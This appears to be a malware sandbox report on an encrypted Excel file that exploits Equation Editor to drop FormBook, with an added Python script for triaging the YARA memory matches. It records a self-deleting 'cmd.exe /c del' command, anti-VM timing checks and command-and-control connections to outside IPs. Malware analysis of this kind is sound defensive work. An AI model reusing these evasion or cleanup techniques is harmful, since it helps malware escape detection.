Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0256EE4C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02582E2F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0257DF7C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025DBF14
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02560F3F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025C2FDC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025ECFB1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025DAC5E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0255CD5B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_02580D3B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025EFDDD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000EC53B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000EB954
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000EB998
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000ECB27
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000D8C2C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000D8C30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000D2D88
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000EBD88
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000D2D90
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_000D2FB0
Source: Order List.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 027F373B appears 245 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 027F3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0281F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 027AE2A8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 027ADF5C appears 123 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 025BF970 appears 84 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0259373B appears 248 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 02593F92 appears 132 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0254E2A8 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0254DF5C appears 124 times
Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
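The YARA rows above name memory dumps rather than files, so the useful triage question is which process each dump came from and whether the matching region was executable. The Python script below is an added example, not part of the Joe Sandbox report: it decodes the dump names, ties process numbers to image names using the UNPACKEDPE rows (which carry the image name) plus a small table taken from the report's other rows (process 6 is explorer.exe, process 7 is rundll32.exe), and lists the executable FormBook-matching regions per image. The field layout of a dump name, <proc>.<stage>.<dump id>.<base address>.<protection>.<type>.sdmp with <protection> holding the Win32 PAGE_* value, is an assumption inferred from the values seen here (00000040 and 00000004 match PAGE_EXECUTE_READWRITE and PAGE_READWRITE), not a format the report documents. The sample rows are constructed copies of rows from the report.

```python
"""Added triage helper, not part of the sandbox report: decode the memory-dump
names in the report's YARA 'Matched rule' rows and list, per process image,
the FormBook-matching regions and whether they are executable. The dump-name
field layout (<proc>.<stage>.<dump id>.<base>.<protection>.<type>.sdmp, with
<protection> holding the Win32 PAGE_* constant) is an assumption inferred
from the values in this report."""
import re

PAGE_PROTECT = {  # Win32 memory protection constants (base values only)
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# 'MEMORY' and 'Matched rule' may be run together in the extracted text.
DUMP_RE = re.compile(
    r"Source:\s*(?P<proc>\d{8})\.(?P<stage>\d{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp"
    r",\s*type:\s*MEMORY\s*\|?\s*Matched rule:\s*(?P<rule>\S+)")
# Unpacked-PE rows carry the image name, which ties a process number to a binary.
UNPACK_RE = re.compile(
    r"Source:\s*(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>[^\s,]+?\.exe)\."
    r"(?P<base>[0-9A-Fa-f]+)\.\d+(?:\.raw)?\.unpack,\s*type:\s*UNPACKEDPE")

# Process numbers the YARA rows do not name themselves; taken from the
# report's other rows (explorer.exe 00000006..., rundll32.exe 00000007...).
PROCESS_IMAGES = {6: "explorer.exe", 7: "rundll32.exe"}

# Constructed sample: rows copied in the report's format (rule metadata shortened).
SAMPLE_ROWS = """
Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein
Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23
Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC
Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23
Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23
Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC
"""


def triage(text, process_images=PROCESS_IMAGES):
    """Return one dict per MEMORY hit: proc, image, base, protection, executable, rule."""
    images = dict(process_images)
    for line in text.splitlines():          # first pass: learn image names
        u = UNPACK_RE.search(line)
        if u:
            images[int(u.group("proc"))] = u.group("image")
    hits = []
    for line in text.splitlines():          # second pass: decode dump names
        m = DUMP_RE.search(line)
        if not m:
            continue
        proc = int(m.group("proc"))
        prot = int(m.group("prot"), 16)
        hits.append({
            "proc": proc,
            "image": images.get(proc, "unknown"),
            "base": int(m.group("base"), 16),
            "protection": PAGE_PROTECT.get(prot & 0xFF, hex(prot)),
            "executable": bool(prot & 0xF0),   # any PAGE_EXECUTE* variant
            "rule": m.group("rule"),
        })
    return hits


def executable_regions(hits):
    """{image: sorted base addresses of executable regions that matched a rule}."""
    out = {}
    for h in hits:
        if h["executable"]:
            out.setdefault(h["image"], set()).add(h["base"])
    return {image: sorted(bases) for image, bases in out.items()}


if __name__ == "__main__":
    for image, bases in executable_regions(triage(SAMPLE_ROWS)).items():
        print(image, [hex(b) for b in bases])
```

The distinction the script draws matters for the incident write-up: a FormBook match inside a PAGE_EXECUTE_READWRITE region of rundll32.exe is the injected payload running in a system process, while a match in a PAGE_READWRITE region of vbc.exe is the still-packed or decrypted payload staged in the loader's heap, which is evidence of the dropper but not of execution there.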
Source: vbc[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/6@10/8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Order List.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD355.tmp
Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: Order List.xlsx | ReversingLabs: Detection: 31%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: RegAsm.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: RegAsm.exe, 00000005.00000003.2168886294.000000000049F000.00000004.00000001.sdmp
          Source: Order List.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Order List.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417141 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B375 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B3C2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B3CB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419BB1 push cs; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406420 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B42C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419CAC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00415D49 push 0000004Ah; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E7141 pushfd ; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB375 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB3CB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB3C2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB42C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D6420 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9BB1 push cs; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9CAC push esp; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E5D49 push 0000004Ah; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85956112401
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85956112401
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (10 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (7 occurrences)
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX|NOOPENFILEERRORBOX
Source: Order List.xlsx | Stream path 'EncryptedPackage' entropy: 7.9982334381 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 00000000004085C4, second address: 00000000004085CA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 000000000040894E, second address: 0000000000408954, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000000D85C4, second address: 00000000000D85CA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000000D894E, second address: 00000000000D8954, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00408880 rdtsc
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2912 | Thread sleep time: -540000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2912 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 268 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2236 | Thread sleep time: -45000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed (2 occurrences)
Source: explorer.exe, 00000006.00000002.2347303435.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2145523561.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2145551150.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2145458014.00000000041AD000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000002.2347347432.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00408880 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027A0078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004C00AD mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004C00AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004C01CB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027900EA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02790080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_027B26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_025526F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write, page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 67.227.214.78 80
Source: C:\Windows\explorer.exe | Network Connect: 104.24.122.89 80
Source: C:\Windows\explorer.exe | Network Connect: 137.59.52.234 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 185.119.173.57 80
